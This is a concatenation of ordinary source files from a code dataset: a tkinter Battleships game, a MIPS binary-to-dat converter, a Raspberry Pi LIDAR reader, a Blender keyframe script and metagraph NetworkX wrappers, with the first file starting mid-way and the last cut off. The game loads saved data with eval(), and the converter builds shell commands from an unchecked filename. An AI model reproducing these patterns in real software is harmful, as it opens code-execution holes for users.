\"computer\"):\r\n            print(\">>> Player resigns.\")\r\n\r\n            # Increments loss stat of current difficulty by 1\r\n            self.manager.stats[self.difficulty][1] += 1\r\n            bg_colour = self.theme.RED\r\n\r\n        # If result isn't false (i.e game is over)\r\n        if result:\r\n\r\n            # Save information to file\r\n            manager.export_to_file()\r\n\r\n            # Sets game over variable to true\r\n            self.game_over = True\r\n\r\n            # Makes a result popup appear after 1.2s\r\n            def popup_appear():\r\n                # Switches the screen to startup 'splash' window\r\n                switch_screen('splash')\r\n\r\n                subtext = \"Current score: {} wins and {} losses on {} difficulty\".format(manager.stats[self.difficulty][0],\r\n                                                                                         manager.stats[self.difficulty][1],\r\n                                                                                         self.difficulty.upper())\r\n                result_popup = Popup(root, text=\"YOU {}!\".format(\"WON\" if (result == \"player\") else \"LOST\"),\r\n                                     bg=bg_colour, fg=self.theme.WHITE, fill=True,\r\n                                     
subtext=subtext)\r\n root.after(1200, popup_appear)\r\n\r\n return result\r\n\r\n\r\n### How the computer decides to play, best to its ability ###\r\n# Note: Computer gameplay difficulty is determined through the 'game' class\r\n#####\r\nclass ComputerLogic(object):\r\n def __init__(self):\r\n\r\n # Alpha-num list of coordinates on the board that have yet to be hit\r\n self.grid = []\r\n\r\n for x in range(10):\r\n for y in range(10):\r\n self.grid.append(CoordUtils.convert_type(x + 1) + str(y + 1))\r\n\r\n # Alpha-num list of coordinates with ships\r\n self.cached_ship_coords = []\r\n\r\n ## Returns a coordinate that has yet to be hit, in alpha-num form ##\r\n def make_move(self):\r\n\r\n # If no ships were hit in previous turns, make random move\r\n if len(self.cached_ship_coords) == 0:\r\n coord = random.choice(self.grid)\r\n surrounding = CoordUtils.get_surrounding_coords(coord)\r\n\r\n for surrounding_coord in surrounding:\r\n\r\n # Checks to see if there are any spaces around the coordinate,\r\n # since there isn't a point in hitting into an enclosed area\r\n if CoordUtils.convert_type(surrounding_coord) in self.grid:\r\n self.grid.remove(coord)\r\n return coord\r\n else:\r\n return self.make_move()\r\n\r\n # If a ship was recently hit (i.e cached), hit around\r\n else:\r\n\r\n # If two or more ship spaces have been hit\r\n if len(self.cached_ship_coords) > 1:\r\n\r\n # For every coordinate with a hit ship in it, check around\r\n for i in range(0, len(self.cached_ship_coords)):\r\n sides = [CoordUtils.get_side_coord(self.cached_ship_coords[i], 'left'),\r\n CoordUtils.get_side_coord(self.cached_ship_coords[i], 'right'),\r\n CoordUtils.get_side_coord(self.cached_ship_coords[i], 'top'),\r\n CoordUtils.get_side_coord(self.cached_ship_coords[i], 'bottom')]\r\n\r\n linked_sides = []\r\n converted_sides = []\r\n\r\n # Checks to see if any sides are linked (i.e contains a previously hit ship)\r\n # and appends it to linked sides. Also creates a copy of sides (converted_sides)\r\n # in which the type has been converted to alpha-num form\r\n for side in sides:\r\n if side: converted_sides.append(CoordUtils.convert_type(side))\r\n else: converted_sides.append(None)\r\n\r\n if side and CoordUtils.convert_type(side) in self.cached_ship_coords:\r\n linked_sides.append(CoordUtils.convert_type(side))\r\n\r\n # If the two hit spaces aren't 'connected', choose random side\r\n # – This shouldn't happen, but if it does... 
backup redundancy\r\n if len(linked_sides) == 0:\r\n while True:\r\n\r\n # Randomly choose a target based on a surrounding coordinate\r\n target = random.choice(converted_sides)\r\n\r\n # If the target choosen is in the computer's grid\r\n if target and target in self.grid:\r\n self.grid.remove(target)\r\n return target\r\n\r\n # If only one side of the hit square is hit\r\n if len(linked_sides) == 1:\r\n index = converted_sides.index(linked_sides[0])\r\n\r\n # Checks which side the hit square is on, and hit on the opposite side\r\n if index == 0 and converted_sides[1] in self.grid:\r\n self.grid.remove(converted_sides[1])\r\n return converted_sides[1]\r\n\r\n elif index == 1 and converted_sides[0] in self.grid:\r\n self.grid.remove(converted_sides[0])\r\n return converted_sides[0]\r\n\r\n elif index == 2 and converted_sides[3] in self.grid:\r\n self.grid.remove(converted_sides[3])\r\n return converted_sides[3]\r\n\r\n elif index == 3 and converted_sides[2] in self.grid:\r\n self.grid.remove(converted_sides[2])\r\n return converted_sides[2]\r\n\r\n else:\r\n continue\r\n\r\n # If both sides of the hit square are hit, continue to next hit coord\r\n if len(linked_sides) == 2:\r\n continue\r\n\r\n surrounding_coords = CoordUtils.get_surrounding_coords(self.cached_ship_coords[0])\r\n\r\n potential_targets = []\r\n\r\n # Append to potential_targets if the surrounding coordinate has yet to be hit\r\n for coord in surrounding_coords:\r\n if CoordUtils.convert_type(coord) in self.grid:\r\n potential_targets.append(CoordUtils.convert_type(coord))\r\n\r\n # Hits the potential_target, else make a random choice\r\n if len(potential_targets) != 0:\r\n target = random.choice(potential_targets)\r\n self.grid.remove(target)\r\n\r\n return target\r\n else:\r\n self.cached_ship_coords = []\r\n return self.make_move()\r\n\r\n ## Note: \"square\" argument is for a coord in alpha-num form (i.e D4) ##\r\n def square_hit(self, coord, sunk=False, ship=None):\r\n\r\n # If the ship was sunk, removes sunk_ship_coordinates from the cache\r\n if sunk: self.cached_ship_coords = [coord for coord in self.cached_ship_coords if coord not in ship]\r\n\r\n # If ship wasn't sunk, add the hit coordinate to the cache\r\n else: self.cached_ship_coords.append(coord)\r\n\r\n next_move = self.make_move()\r\n return next_move\r\n\r\n ## Automatically generates the computer's layout ##\r\n def generate_layout(self):\r\n\r\n # Potential ship types\r\n ship_lengths = [2, 3, 3, 4, 5]\r\n direction = ['right', 'bottom']\r\n\r\n computer_ships = []\r\n coords = []\r\n\r\n # As long as there are still ships to make\r\n while len(ship_lengths) > 0:\r\n\r\n # Generates random coordinates\r\n x = random.randint(1, 10)\r\n y = random.randint(1, 10)\r\n\r\n length = random.choice(ship_lengths)\r\n\r\n # Gets the coordinates of the ship that will be created\r\n ship_coords = CoordUtils.get_coords_along_side((x, y), random.choice(direction), length)\r\n\r\n # If the new coordinates for the to-be-created ship exist, make it a thing\r\n # If they don't exist (i.e obstruct another ship or non-exist grid squares),\r\n # restart the loop. 
Process continues until all ships have been placed.\r\n            if ship_coords:\r\n                for coord in ship_coords:\r\n                    if coord in coords:\r\n                        break\r\n                else:\r\n                    # Adds new ship to temp 'computer_ships' variable\r\n                    computer_ships.append(ship_coords)\r\n                    [coords.append(coord) for coord in ship_coords]\r\n\r\n                    # Removes the current ship length from the list of possible lengths\r\n                    ship_lengths.remove(length)\r\n\r\n        return computer_ships\r\n\r\n    ## Updates the computer's grid memory by removing previously hit spaces ##\r\n    # Note: Coordinates to be in alpha-num form\r\n    def set_hit_spaces(self, hit_spaces):\r\n        for coord in hit_spaces:\r\n            if coord in self.grid:\r\n                self.grid.remove(coord)\r\n\r\n\r\n### Manager for reading / writing to files for saving ###\r\nclass Manager(object):\r\n    def __init__(self):\r\n        self.saved_games = []\r\n\r\n        # Note: [0] is wins, [1] is losses\r\n        self.stats = {'easy': [0, 0],\r\n                      'normal': [0, 0],\r\n                      'hard': [0, 0],\r\n                      'master': [0, 0]}\r\n\r\n        # Defines theme as 'default' theme\r\n        self.theme = \"default\"\r\n\r\n    ## Export all saved games (3) and scores to file ##\r\n    def export_to_file(self):\r\n\r\n        # Writes/overwrites stats.bts file with new stats\r\n        with open('bin/stats.bts', 'w') as file:\r\n            file.write(str(self.stats))\r\n\r\n        # Writes/overwrites saves.bts file with new saves\r\n        with open('bin/saves.bts', 'w') as file:\r\n            file.write(str(self.saved_games))\r\n\r\n    ## Imports all saved games (3) and scores to memory ##\r\n    def import_to_memory(self):\r\n\r\n        # If stats.bts is a file, import everything from stats\r\n        if os.path.isfile('bin/stats.bts'):\r\n            with open('bin/stats.bts', 'r') as file:\r\n                self.stats = eval(file.read())\r\n\r\n        # If saves.bts is a file, import everything from saves\r\n        if os.path.isfile('bin/saves.bts'):\r\n            with open('bin/saves.bts', 'r') as file:\r\n                self.saved_games = eval(file.read())\r\n\r\n    ## Resets the scores to 0 ##\r\n    def reset_scores(self):\r\n        self.stats = {'easy': [0, 0],\r\n                      'normal': [0, 0],\r\n                      'hard': [0, 0],\r\n                      'master': [0, 0]}\r\n        self.export_to_file()\r\n\r\n    ## Replaces old games if all saves are full ##\r\n    def save_game(self, game_data):\r\n\r\n        # If current length of saves is greater than 2 (3 or more), delete oldest\r\n        if len(self.saved_games) > 2:\r\n            del self.saved_games[0]\r\n\r\n        # Add new save\r\n        self.saved_games.append(game_data)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    # Defines the manager for the application\r\n    manager = Manager()\r\n    manager.import_to_memory()\r\n\r\n    root = tk.Tk()\r\n\r\n    # Defines starting layout\r\n    root.wm_geometry(\"850x600\")\r\n    root.wm_resizable(0, 0)\r\n    root.wm_title(\"Battleships V{:.2f} beta\".format(version))\r\n\r\n    root[\"bg\"] = 'white'\r\n\r\n    # The 'frame' that's displayed on the application window\r\n    current_screen = None\r\n\r\n    # Makes main window appear as startup splash\r\n    switch_screen('splash')\r\n\r\n    root.mainloop()\r\n\r\n    # Exports manager stats and saves to file if application is closed.\r\n    manager.export_to_file()\r\n","sub_path":"Battleships (v2.21)/battleships.py","file_name":"battleships.py","file_ext":"py","file_size_in_byte":54810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"322910937","text":"import binascii\nimport sys\nimport os\n#import re\n#import struct\n\nsourceFile = sys.argv[1]#raw_input(\"Input assembly source file name: \")\n#sourceFile = raw_input(\"Input assembly source file name: \")\nif os.path.isfile(sourceFile) == False:\n    print(sourceFile + \" doesn't 
exist!\")\n    os._exit(0)\n\n#if os.path.isfile(\"as-new\") == False:\n#    print(sourceFile + \" doesn't exist!\")\n#    os._exit(0)\n\n#if os.path.isfile(\"mipsel-linux-ld\") == False:\n#    print(sourceFile + \" doesn't exist!\")\n#    os._exit(0)\n\nif os.path.isfile(\"mipsel-linux-objcopy\") == False:\n    print(\"mipsel-linux-objcopy doesn't exist!\")\n    os._exit(0)\n\n#objectFile = sourceFile[:-2] + \".o\"\noutFile = sourceFile[:-4] + \".out\"\ndatFileSim = sourceFile[:-4]\ndatFileRtl = sourceFile[:-4] + \".dat\"\n\n#fopen=open(objectFile,'rb')\n#w_str=\"\"\n#for line in fopen:\n#    if re.search(\"e803\",line):\n#        line=re.sub(\"e803\",\"0800\",line)\n#        w_str+=line\n#    else:\n#        w_str+=line\n#fopen.close()\n#wopen=open(objectFile,'w')\n#wopen.write(w_str)\n#wopen.close()\n'''\nwith open(objectFile,'rb') as fd:\n    buff = fd.read()\n\nl = len(buff)\ns = struct.unpack('%ds'%l,buff)[0]\n#print(s)\ns = list(s)\ns[18] = 0x08\ns[19] = 0x00\ns = bytes(s)\nbuff = struct.pack('%ds'%l,s)\n#print(buff)\n\nwith open(objectFile,'wb') as fd:\n    fd.write(buff)\n'''\n#os.system(\"./as-new \" + sourceFile + \" -g --gdwarf-2 -o \" + objectFile)\n#os.system(\"./mipsel-linux-ld -T link.x \" + objectFile + \" -o \" + outFile)\nos.system(\"./mipsel-linux-objcopy -O binary \"+ outFile + \" \" + datFileSim)\nif os.path.isfile(datFileSim) == False:\n    print(\"Failed to create \"+datFileSim)\n    os._exit(0)\nfb_s = open(datFileSim,'rb')\nfb_d = open(datFileRtl,'w')\n\n#process data segment\n#1) a line in the data segment file has 4 words (32 bits per word), such as 1 2 3 4; reverse it to 4 3 2 1\n#2) if more than 9 consecutive all-zero lines are encountered in the data segment,\n#   skip the remaining zero lines until a non-zero line appears\nzero_count = 0\nfor i in range(0,65536):\n    insnPack = fb_s.read(16)\n    if(len(insnPack) != 16):\n        break\n#    if(insnPack == \"0000000000000000\"):\n#        continue\n    insnPack = binascii.b2a_hex(insnPack)\n    if(insnPack == \"00000000000000000000000000000000\"):\n        zero_count += 1\n    else:\n        zero_count = 0\n# do not print further zero lines after encountering 9 consecutive zero lines,\n# but keep reading and counting until a non-zero line, where zero_count is cleared\n# and printing restarts.\n    if(zero_count > 9):\n        continue\n    insn0 = insnPack[0:8]\n    insn1 = insnPack[8:16]\n    insn2 = insnPack[16:24]\n    insn3 = insnPack[24:32]\n#    if(insn0 == \"00000000\" and insn1 == \"00000000\" and insn2 == \"00000000\" and insn3 == \"00000000\"):\n#        continue\n    insn0 = insn0[6:8]+insn0[4:6]+insn0[2:4]+insn0[0:2] + '\\n'\n    insn1 = insn1[6:8]+insn1[4:6]+insn1[2:4]+insn1[0:2] + '_'\n    insn2 = insn2[6:8]+insn2[4:6]+insn2[2:4]+insn2[0:2] + '_'\n    insn3 = insn3[6:8]+insn3[4:6]+insn3[2:4]+insn3[0:2] + '_'\n    addr = '{0:0>4}'.format(hex(i).replace(\"0x\",''))\n    #i#fb_d.write(addr + '\\n')\n    fb_d.write(\"32'h000\" + addr + '0,\\t' + \"128'h\" + insn3 + insn2 + insn1 + insn0)\n\n#process code segment\n#a line in the code segment file has 4 instructions (32 bits per instruction), i.e. 16 bytes (32 hex chars) per line,\n#reversing the sequence of the 4 bytes in an instruction to convert little-endian to big-endian,\n#such as 0x12345678 switched to 0x78563412.\nfor i in range(64,32768):\n    insnPack = fb_s.read(16)\n    if(len(insnPack) != 16):\n        break\n    insnPack = binascii.b2a_hex(insnPack)\n    insn0 = insnPack[0:8]\n    insn1 = insnPack[8:16]\n    insn2 = insnPack[16:24]\n    insn3 = insnPack[24:32]\n    insn0 = insn0[6:8]+insn0[4:6]+insn0[2:4]+insn0[0:2] + '_'\n    insn1 = insn1[6:8]+insn1[4:6]+insn1[2:4]+insn1[0:2] + '_'\n    insn2 = insn2[6:8]+insn2[4:6]+insn2[2:4]+insn2[0:2] + 
'\\n'\n    addr = '{0:0>4}'.format(hex(i).replace(\"0x\",''))\n    #i#fb_d.write(addr + '\\n')\n    fb_d.write(\"32'h001\" + addr + '0,\\t' + \"128'h\" + insn0 + insn1 + insn2 + insn3)\n\ninsnPack = binascii.b2a_hex(insnPack)\nif(len(insnPack) == 8):\n    insn0 = insnPack[0:8]\n    insn0 = insn0[6:8]+insn0[4:6]+insn0[2:4]+insn0[0:2] + '_'\n    insn3 = '80000000'\n    addr = '{0:0>4}'.format(hex(i).replace(\"0x\",''))\n    fb_d.write(\"32'h001\" + addr + '0,\\t' + \"128'h\" + insn0 + insn3 + '_' + insn3 + '_' + insn3 + '\\n')\nelif(len(insnPack) == 16):\n    insn0 = insnPack[0:8]\n    insn1 = insnPack[8:16]\n    insn0 = insn0[6:8]+insn0[4:6]+insn0[2:4]+insn0[0:2] + '_'\n    insn1 = insn1[6:8]+insn1[4:6]+insn1[2:4]+insn1[0:2] + '_'\n    insn3 = '80000000'\n    addr = '{0:0>4}'.format(hex(i).replace(\"0x\",''))\n    fb_d.write(\"32'h001\" + addr + '0,\\t' + \"128'h\" + insn0 + insn1 + insn3 + '_' + insn3 + '\\n')\nelif(len(insnPack) == 24):\n    insn0 = insnPack[0:8]\n    insn1 = insnPack[8:16]\n    insn2 = insnPack[16:24]\n    insn0 = insn0[6:8]+insn0[4:6]+insn0[2:4]+insn0[0:2] + '_'\n    insn1 = insn1[6:8]+insn1[4:6]+insn1[2:4]+insn1[0:2] + '_'\n    insn2 = insn2[6:8]+insn2[4:6]+insn2[2:4]+insn2[0:2] + '_'\n    insn3 = '80000000'\n    addr = '{0:0>4}'.format(hex(i).replace(\"0x\",''))\n    fb_d.write(\"32'h001\" + addr + '0,\\t' + \"128'h\" + insn0 + insn1 + insn2 + insn3 + '\\n')\nelif(len(insnPack) != 0):\n    print('error in length of instructions!')\n\n\n \n#insn = fb_s.read(4)\n#insnString = binascii.b2a_hex(insn)\n#print insnString[6:8]+insnString[4:6]+insnString[2:4]+insnString[0:2]\n\n#insn = fb_s.read(4)\n#insnString = binascii.b2a_hex(insn)\n#print insnString[6:8]+insnString[4:6]+insnString[2:4]+insnString[0:2]\n\n\nfb_s.close()\nfb_d.close()\n","sub_path":"20190603-linux-linker/命令行使用/trobjdat.py","file_name":"trobjdat.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"54326228","text":"import smbus\nimport threading\nimport time\nimport RPi.GPIO as GPIO\nfrom collections import deque\n\n\nclass LIDARLite(threading.Thread):\n\n    ADDR = 0x62\n    I2C_BUS_NO = 1\n    INTERRUPT_GPIO_PIN = 4\n\n    def __init__(self):\n        super().__init__()\n        self.bus = smbus.SMBus(LIDARLite.I2C_BUS_NO)\n        self.address = LIDARLite.ADDR\n        self.since_bias_correction = 0  # used to perform a receiver bias correction every n measurements\n        self.bias_correction_interval = 100\n        self._terminate = threading.Event()\n\n    def run(self):\n        print(\"LIDAR Lite thread initialized on address %s\" % (self.address))\n        self.initialize()\n        while True:\n            if self._terminate.is_set():\n                self.cleanup()\n                break\n\n            GPIO.wait_for_edge(LIDARLite.INTERRUPT_GPIO_PIN, GPIO.FALLING)  # blocks until we see a falling edge on the LIDAR\n            tm = time.time()\n\n            # actually read from the lidar\n            dist_cm = self.read()\n            print(dist_cm)\n\n            self.measurement_buffer.append((tm, dist_cm/100))\n\n            self.since_bias_correction += 1\n            # every so often, we need to perform a bias correction routine\n            if self.since_bias_correction >= self.bias_correction_interval:\n                self.bias_correction_mode()\n                self.since_bias_correction = -1\n            elif self.since_bias_correction == 0:\n                self.normal_mode()\n\n    def initialize(self):\n\n        # LIDAR Lite initialisation over I2C\n        self.bus.write_byte_data(self.address, 0x11, 0xff)  # continuously repeat measure command\n        self.bus.write_byte_data(self.address, 0x45, 0x03)  # command repeat interval - should be approximately 2000/Hz\n        self.bus.write_byte_data(self.address, 0x04, 0x35)  # acquisition mode control register. 
set to interrupt and run fast\n        self.bus.write_byte_data(self.address, 0x00, 0x04)  # initially make measurement with receiver bias correction\n        self.bus.write_byte_data(self.address, 0x12, 0x03)  # number of acquisitions per measurement\n\n        # Enable the interrupt pin as a GPIO input\n        GPIO.setmode(GPIO.BCM)\n        GPIO.setup(self.INTERRUPT_GPIO_PIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n        self.last_tm = time.time()  # so we can capture the dt between interrupts from the lidar - for debugging purposes\n        self.measurement_buffer = deque([], maxlen=1000)  # fills with a list of (tm, dist) tuples. deque to stop filling memory and crashing\n\n    def read(self):\n        \"\"\" Read the distance from the LIDAR's registers, in cm \"\"\"\n        high_byte = self.bus.read_byte_data(self.address, 0x0f)\n        low_byte = self.bus.read_byte_data(self.address, 0x10)\n        return (high_byte << 8) + low_byte\n\n    def flush(self):\n        \"\"\" Return the recent sensor measurements, and clear the measurement buffer \"\"\"\n        ret_list = list(self.measurement_buffer)\n        self.measurement_buffer.clear()\n        return ret_list\n\n    def bias_correction_mode(self):\n        self.bus.write_byte_data(self.address, 0x00, 0x04)  # set the LIDAR to perform a bias correction routine\n\n    def normal_mode(self):\n        self.bus.write_byte_data(self.address, 0x00, 0x03)  # set the LIDAR to just measure\n\n    def terminate(self):\n        self._terminate.set()\n\n    def cleanup(self):\n        print(\"Terminating LIDAR Lite read loop\")\n        GPIO.cleanup()\n","sub_path":"lidar.py","file_name":"lidar.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"228141895","text":"#!BPY\n\n\"\"\" Shift keyframes in order to speed-up/slow-down a movie\nor give time for another sequence of animations in between.\n\"\"\"\n#\n# Kristin Riebe, E-Science at AIP, kriebe@aip.de, 04.02.2015\n#\n# NOTE: This can break your animation completely, if keyframes\n# 'overtake' one another. There's no error handling included here.\n# NOTE: Only works properly for fcurves with bezier-shape or poly-curves.\n# Fcurve-modifiers are not taken into account.\n#\n# TODO: Maybe only stretch keyframes with data_path location etc.\n# for material/texture fades, keep the distance, but\n# shift the initial keyframe?\n\n\nimport bpy\nimport fnmatch\n\n\ndef get_actions_for_objects(namepattern=\"*\"):\n    \"\"\"Collect all actions for the matching objects, their data \n    and their materials. Each material-action is to be used only once.\n    Return set of actions that can be used as input for\n    shift_keyframes().\n\n    Keyword arguments:\n    namepattern -- name pattern of objects for which the animation-\n                   actions are collected. (default: *)\n\n    \"\"\"\n    # NOTE: If a non-matching object has the same material as a\n    # matching object, its material keyframes will be shifted!!\n    # If you don't want that, make the non-matching object's material\n    # unique beforehand.\n\n    # Find matching objects and store in list\n    bpy.ops.object.select_all(action='DESELECT')\n    objects = [obj for obj in bpy.data.objects\n               if fnmatch.fnmatchcase(obj.name, namepattern)]\n\n    # Gather all necessary actions for the objects and their materials,\n    # use set() in order to get unique values only,\n    # i.e. 
each animation-action (especially for materials) shall occur only\n # once.\n actions = set()\n for obj in objects:\n print(\"Object \", obj.name)\n\n if obj.animation_data is not None:\n action = obj.animation_data.action\n if action is not None:\n actions.add(action)\n\n if obj.data is not None:\n if obj.data.animation_data is not None:\n action = obj.data.animation_data.action\n if action is not None:\n actions.add(action)\n\n # Loop over materials of this object\n for matslot in obj.material_slots:\n print(\"Material \", matslot.name)\n\n if matslot.material.animation_data is not None:\n action = matslot.material.animation_data.action\n if action is not None:\n actions.add(action)\n\n return actions\n\n\ndef shift_keyframes(actions=bpy.data.actions, factor=1, frameshift=0,\n frame_start=0, frame_end=1000000):\n \"\"\"\n Shift keyframes by given factor or frameshift for given actions\n within given number of frames.\n In details: shift the keyframe_points and their handles.\n Only works properly for fcurves with bezier-shape or poly-curves.\n Fcurve-modifiers are not taken into account.\n\n Keyword arguments:\n actions -- set or list of actions for which frames shall be\n shifted (default: all actions available)\n frame_start, frame_end -- range of frames for which keyframe_points\n are shifted\n factor -- stretch keyframe_points in given range by this factor\n frameshift -- add this number to the keyframe_points in given range\n \"\"\"\n\n # Loop over all actions and their fcurves,\n # multiply keyframe-positions and handles by given factor\n # and then shift by given frameshift\n for action in actions:\n print(\"Action \", action.name)\n\n for fcu in action.fcurves:\n print(\" %s channel %d\" % (fcu.data_path, fcu.array_index))\n\n for keyframe in fcu.keyframe_points:\n\n if (keyframe.co[0] >= frame_start\n and keyframe.co[0] <= frame_end):\n\n #print(\" %s\" % keyframe.co) # coordinates x,y\n\n keyframe.co[0] = keyframe.co[0]*factor + frameshift\n keyframe.handle_left[0] = (keyframe.handle_left[0]*factor\n + frameshift)\n keyframe.handle_right[0] = (keyframe.handle_right[0]*factor\n + frameshift)\n\n return\n\n\nif __name__ == \"__main__\":\n\n # Just stretch everything by factor 3\n #shift_keyframes(factor=3)\n\n # Get actions for specified objects only\n actions = get_actions_for_objects(namepattern='C*')\n #print('Actions: ', actions)\n\n # Stretch only keyframes for these animation actions\n shift_keyframes(actions=actions, factor=2)\n","sub_path":"shift_keyframes.py","file_name":"shift_keyframes.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"197848859","text":"import metagraph as mg\nfrom metagraph import concrete_algorithm, NodeID\nfrom metagraph.plugins import has_networkx, has_community, has_pandas\nfrom typing import Tuple, Iterable, Any, Callable\n\n\nif has_networkx:\n import networkx as nx\n import numpy as np\n from .types import NetworkXGraph, NetworkXBipartiteGraph\n from ..python.types import PythonNodeMap, PythonNodeSet\n from ..numpy.types import NumpyVector\n\n @concrete_algorithm(\"centrality.pagerank\")\n def nx_pagerank(\n graph: NetworkXGraph, damping: float, maxiter: int, tolerance: float\n ) -> PythonNodeMap:\n pagerank = nx.pagerank(\n graph.value, alpha=damping, max_iter=maxiter, tol=tolerance, weight=None\n )\n return PythonNodeMap(pagerank)\n\n @concrete_algorithm(\"centrality.katz\")\n def nx_katz_centrality(\n graph: NetworkXGraph,\n attenuation_factor: 
float,\n immediate_neighbor_weight: float,\n maxiter: int,\n tolerance: float,\n ) -> PythonNodeMap:\n katz_centrality_scores = nx.katz_centrality(\n graph.value,\n alpha=attenuation_factor,\n beta=immediate_neighbor_weight,\n max_iter=maxiter,\n tol=tolerance,\n weight=graph.edge_weight_label,\n )\n return PythonNodeMap(katz_centrality_scores)\n\n @concrete_algorithm(\"cluster.triangle_count\")\n def nx_triangle_count(graph: NetworkXGraph) -> int:\n triangles = nx.triangles(graph.value)\n # Sum up triangles from each node\n # Divide by 3 because each triangle is counted 3 times\n total_triangles = sum(triangles.values()) // 3\n return total_triangles\n\n @concrete_algorithm(\"clustering.connected_components\")\n def nx_connected_components(graph: NetworkXGraph) -> PythonNodeMap:\n index_to_label = dict()\n for i, nodes in enumerate(nx.connected_components(graph.value)):\n for node in nodes:\n index_to_label[node] = i\n return PythonNodeMap(index_to_label,)\n\n @concrete_algorithm(\"clustering.strongly_connected_components\")\n def nx_strongly_connected_components(graph: NetworkXGraph) -> PythonNodeMap:\n index_to_label = dict()\n for i, nodes in enumerate(nx.strongly_connected_components(graph.value)):\n for node in nodes:\n index_to_label[node] = i\n return PythonNodeMap(index_to_label,)\n\n @concrete_algorithm(\"clustering.label_propagation_community\")\n def nx_label_propagation_community(graph: NetworkXGraph) -> PythonNodeMap:\n communities = nx.algorithms.community.label_propagation.label_propagation_communities(\n graph.value\n )\n index_to_label = dict()\n for label, nodes in enumerate(communities):\n for node in nodes:\n index_to_label[node] = label\n return PythonNodeMap(index_to_label,)\n\n @concrete_algorithm(\"subgraph.extract_subgraph\")\n def nx_extract_subgraph(\n graph: NetworkXGraph, nodes: PythonNodeSet\n ) -> NetworkXGraph:\n subgraph = graph.value.subgraph(nodes.value)\n return NetworkXGraph(subgraph, edge_weight_label=graph.edge_weight_label)\n\n @concrete_algorithm(\"subgraph.k_core\")\n def nx_k_core(graph: NetworkXGraph, k: int) -> NetworkXGraph:\n k_core_graph = nx.k_core(graph.value, k)\n return NetworkXGraph(k_core_graph, edge_weight_label=graph.edge_weight_label)\n\n @concrete_algorithm(\"traversal.bellman_ford\")\n def nx_bellman_ford(\n graph: NetworkXGraph, source_node: NodeID\n ) -> Tuple[PythonNodeMap, PythonNodeMap]:\n predecessors_map, distance_map = nx.bellman_ford_predecessor_and_distance(\n graph.value, source_node\n )\n single_parent_map = {\n child: parents[0] if len(parents) > 0 else source_node\n for child, parents in predecessors_map.items()\n }\n return (\n PythonNodeMap(single_parent_map,),\n PythonNodeMap(distance_map,),\n )\n\n @concrete_algorithm(\"traversal.dijkstra\")\n def nx_dijkstra(\n graph: NetworkXGraph, source_node: NodeID # , max_path_length: float\n ) -> Tuple[PythonNodeMap, PythonNodeMap]:\n predecessors_map, distance_map = nx.dijkstra_predecessor_and_distance(\n graph.value, source_node, # cutoff=max_path_length,\n )\n single_parent_map = {\n child: parents[0] if len(parents) > 0 else source_node\n for child, parents in predecessors_map.items()\n }\n return (\n PythonNodeMap(single_parent_map,),\n PythonNodeMap(distance_map,),\n )\n\n @concrete_algorithm(\"centrality.betweenness\")\n def nx_betweenness_centrality(\n graph: NetworkXGraph,\n nodes: mg.Optional[PythonNodeSet],\n normalize: bool,\n # include_endpoints: bool,\n ) -> PythonNodeMap:\n if nodes is None:\n sources = targets = graph.value.nodes\n else:\n sources = targets 
= nodes.value\n node_to_score_map = nx.betweenness_centrality_subset(\n graph.value,\n sources=sources,\n targets=targets,\n normalized=normalize,\n weight=graph.edge_weight_label,\n # endpoints=include_endpoints,\n )\n return PythonNodeMap(node_to_score_map,)\n\n @concrete_algorithm(\"traversal.bfs_iter\")\n def nx_breadth_first_search(\n graph: NetworkXGraph, source_node: NodeID, depth_limit: int\n ) -> NumpyVector:\n bfs_ordered_node_array = np.array(\n nx.breadth_first_search.bfs_tree(graph.value, source_node)\n )\n return NumpyVector(bfs_ordered_node_array)\n\n @concrete_algorithm(\"bipartite.graph_projection\")\n def nx_graph_projection(\n bgraph: NetworkXBipartiteGraph, nodes_retained: int\n ) -> NetworkXGraph:\n g_proj = nx.projected_graph(bgraph.value, bgraph.nodes[nodes_retained])\n return NetworkXGraph(\n g_proj,\n node_weight_label=bgraph.node_weight_label,\n edge_weight_label=bgraph.edge_weight_label,\n )\n\n @concrete_algorithm(\"util.graph.aggregate_edges\")\n def nx_graph_aggregate_edges(\n graph: NetworkXGraph,\n func: Callable[[Any, Any], Any],\n initial_value: Any,\n in_edges: bool,\n out_edges: bool,\n ) -> PythonNodeMap:\n result_dict = {node: initial_value for node in graph.value.nodes}\n if in_edges or out_edges:\n if in_edges != out_edges:\n is_directed = NetworkXGraph.Type.compute_abstract_properties(\n graph, {\"is_directed\"}\n )[\"is_directed\"]\n if not is_directed:\n in_edges = out_edges = True\n for start_node, end_node, weight in graph.value.edges.data(\n graph.edge_weight_label\n ):\n if out_edges:\n result_dict[start_node] = func(weight, result_dict[start_node])\n if in_edges:\n result_dict[end_node] = func(weight, result_dict[end_node])\n return PythonNodeMap(result_dict)\n\n @concrete_algorithm(\"util.graph.filter_edges\")\n def nx_graph_filter_edges(\n graph: NetworkXGraph, func: Callable[[Any], bool]\n ) -> NetworkXGraph:\n result_nx_graph = type(graph.value)()\n result_nx_graph.add_nodes_from(graph.value.nodes.data())\n ebunch = filter(\n lambda uvw_triple: func(uvw_triple[-1]),\n graph.value.edges.data(data=graph.edge_weight_label),\n )\n result_nx_graph.add_weighted_edges_from(ebunch, weight=graph.edge_weight_label)\n return NetworkXGraph(\n result_nx_graph,\n node_weight_label=graph.node_weight_label,\n edge_weight_label=graph.edge_weight_label,\n )\n\n @concrete_algorithm(\"util.graph.assign_uniform_weight\")\n def nx_graph_assign_uniform_weight(\n graph: NetworkXGraph, weight: Any\n ) -> NetworkXGraph:\n result_nx_graph = graph.value.copy()\n for _, _, edge_attributes in result_nx_graph.edges.data():\n edge_attributes[graph.edge_weight_label] = weight\n return NetworkXGraph(\n result_nx_graph, graph.node_weight_label, graph.edge_weight_label\n )\n\n\nif has_networkx and has_community:\n import community as community_louvain\n from .types import NetworkXGraph\n from ..python.types import PythonNodeMap\n\n @concrete_algorithm(\"clustering.louvain_community\")\n def nx_louvain_community(graph: NetworkXGraph) -> Tuple[PythonNodeMap, float]:\n 